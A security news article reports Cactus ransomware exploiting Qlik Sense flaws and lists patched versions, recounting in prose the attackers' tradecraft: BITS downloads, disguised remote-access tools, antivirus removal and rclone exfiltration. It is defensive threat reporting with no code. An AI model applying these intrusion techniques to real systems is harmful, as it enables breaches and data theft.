Cactus ransomware has been exploiting critical vulnerabilities in the Qlik Sense data analytics solution to get initial access on corporate networks.
Qlik Sense supports multiple data sources and allows users to create custom data reports or interactive visualizations that can serve in decision making processes. The product can work both locally or in the cloud.
In late August, the vendor released security updates for two critical vulnerabilities affecting the Windows version of the platform. One of the vulnerabilities, a path traversal bug tracked as CVE-2023-41266, could be exploited to generate anonymous sessions and perform HTTP requests to unauthorized endpoints.
The second issue, tracked as CVE-2023-41265 and with a critical severity of 9.8, does not require authentication and can be leveraged to elevate privileges and execute HTTP requests on the backend server that hosts the application.
On September 20, Qlik discovered that the fix for CVE-2023-41265 was insufficient provided a new update, tracking the issue as a separate vulnerability identified as CVE-2023-48365.
In a recent report, cybersecurity company Arctic Wolf warns of Cactus ransomware actively exploiting these flaws on publicly-exposed Qlik Sense instances that remain unpatched.
Cactus ransomware campaign
The Cactus ransomware attacks that Arctic Wolf observed exploit the security issues to execute code that causes the Qlik Sense Scheduler service to initiate new processes.
The attackers use PowerShell and the Background Intelligent Transfer Service (BITS) to download tools that establish persistence and provide remote access to the machine:
- ManageEngine UEMS executables disguised as Qlik files
- AnyDesk fetched straight from the official website
- A Plink (PuTTY Link) binary renamed to “putty.exe”
Additionally, the attackers execute multiple discovery commands with the output redirected into .TTF files, which Artic Wolf researchers believe is for obtaining command output via path traversal.
The threat actor also used various methods to remain hidden and to gather information, such as uninstalling Sophos antivirus, changing the administrator password, and establishing an RDP tunnel using the Plink command-line connection tool.
In the final stage of the attack, the hackers deployed the Cactus ransomware on the breached systems.
Additional evidence collected by Arctic Wolf’s analysts suggests that the threat actors used RDP to move laterally, WizTree to anlayze disk space, and rclone (disguised as ‘svchost.exe’) to exfiltrate data.
The use of these tools and techniques are consistent with what researchers observed in previous Cactus ransomware attacks.
To mitigate the risks of a breach, Qlik recommends upgrading to the following versions of Sense Enterprise for Windows:
- August 2023 Patch 2
- May 2023 Patch 6
- February 2023 Patch 10
- November 2022 Patch 12
- August 2022 Patch 14
- May 2022 Patch 16
- February 2022 Patch 15
- November 2021 Patch 17
Cactus ransomware emerged in March this year and adopted the double-extortion tactic, stealing data from victims and then encrypting it on compromised systems. In past attacks, they exploited Fortinet VPN flaws for initial network access.
Researchers at Kroll in a report in May set the ransomware operation apart due to the use of the encryption to protect the malware binary from being detected by security products.
The researchers also highlighted the use of AnyDesk remote desktop application, the rclone tool to send stolen data to cloud storage services, and the use of batch scripts to uninstall security products.